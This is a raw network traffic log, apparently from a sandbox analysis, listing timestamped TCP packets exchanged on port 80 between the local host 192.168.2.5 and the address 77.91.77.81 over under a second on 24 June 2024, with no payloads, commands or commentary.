Jun 24, 2024 00:10:18.716006994 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716247082 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716280937 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716296911 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716311932 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716326952 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716330051 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716346025 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716362000 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716370106 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716384888 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716398954 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716414928 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716439009 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716626883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716666937 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716671944 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716710091 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716751099 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716766119 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.716789961 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.716814995 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717087030 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717130899 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717133999 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717145920 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717178106 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717200994 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717215061 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717230082 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717261076 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717292070 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717823029 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717866898 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717885971 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717900991 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717925072 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717937946 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717950106 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.717952013 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717967033 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.717976093 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718002081 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718019962 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718019962 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718060970 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718650103 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718664885 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718679905 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718692064 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718714952 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718718052 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718729019 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718735933 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718744993 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718755960 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718781948 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.718782902 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.718831062 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.719451904 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.719501019 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.719506025 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.719522953 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.719547987 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.719573021 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.719604015 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.719619989 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.719635010 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.719643116 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.719650030 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.719672918 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.719717979 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.720369101 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.720385075 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.720400095 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.720422029 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.720447063 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.720448017 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.720463037 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.720488071 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.720521927 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.720525980 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.720537901 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.720573902 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.720597029 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.721224070 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.721259117 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.721271992 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.721273899 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.721298933 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.721340895 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.721362114 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.721375942 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.721390963 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.721407890 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.721411943 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.721431971 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.721467972 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.722174883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.722189903 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.722204924 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.722225904 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.722244978 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.722245932 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.722260952 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.722275972 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.722286940 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.722307920 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.722325087 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.722358942 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723325968 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.723351955 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.723366976 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.723377943 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723406076 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723411083 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.723426104 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.723431110 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723440886 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.723452091 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723475933 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.723476887 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723498106 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723520041 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.723990917 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.724006891 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.724020958 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.724044085 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.724083900 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769237041 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769280910 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769298077 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769423008 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769423008 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769449949 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769464016 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769478083 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769500017 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769547939 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769675970 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769725084 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769756079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769772053 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769804955 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769833088 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769895077 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769910097 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769925117 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769939899 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.769943953 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.769963026 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.770003080 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.770035982 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.770050049 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.770064116 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.770080090 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.770085096 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.770095110 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.770106077 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.770139933 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804212093 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804256916 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804271936 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804296970 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804299116 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804312944 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804328918 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804352045 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804410934 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804423094 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804471970 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804507017 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804522038 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804543972 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804550886 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804562092 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804577112 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804589033 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804593086 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804608107 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804627895 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804672003 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804677963 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804692030 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804707050 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804723978 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804760933 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.804765940 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.804811954 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842011929 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842084885 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842092991 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842139959 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842183113 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842226982 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842259884 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842276096 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842298985 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842328072 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842329025 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842343092 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842359066 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842365026 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842396021 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842420101 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842444897 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842459917 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842474937 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842492104 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842516899 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842547894 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842564106 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842595100 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842628002 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842629910 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842644930 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842659950 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842669010 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842683077 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842695951 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842699051 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842719078 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842741966 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842755079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842771053 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842794895 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842832088 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842844963 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842859983 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842883110 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842911005 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842916012 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842931032 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842963934 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.842972994 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842988014 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.842989922 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843013048 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843040943 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843044996 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843084097 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843086958 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843097925 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843128920 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843147039 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843153000 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843163013 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843185902 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843188047 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843213081 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843231916 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843239069 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843265057 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843274117 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843281031 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843302965 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843329906 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843352079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843368053 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843383074 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843391895 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843424082 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843461037 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843506098 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843527079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843543053 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843571901 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843590021 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843612909 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843628883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843643904 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843657017 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843660116 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843689919 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843694925 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843735933 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843838930 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843854904 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843869925 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843879938 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843919992 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.843974113 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.843990088 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.844005108 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.844019890 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.844021082 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.844043970 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.844069004 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.844083071 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.844084978 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.844118118 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.844140053 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847172976 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847223997 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847225904 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847239017 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847265005 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847291946 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847381115 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847394943 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847409964 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847425938 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847433090 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847449064 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847454071 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847464085 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847481012 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847496033 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847498894 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847511053 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847518921 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847552061 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847589016 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847603083 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847616911 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847629070 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847630978 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847671986 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847702980 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847709894 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847754002 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847757101 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847770929 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847809076 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847810030 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847825050 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847841978 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847862005 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847876072 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847888947 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847927094 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.847959995 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.847975016 CEST	80	49723	77.91.77.81	192.168.2.5
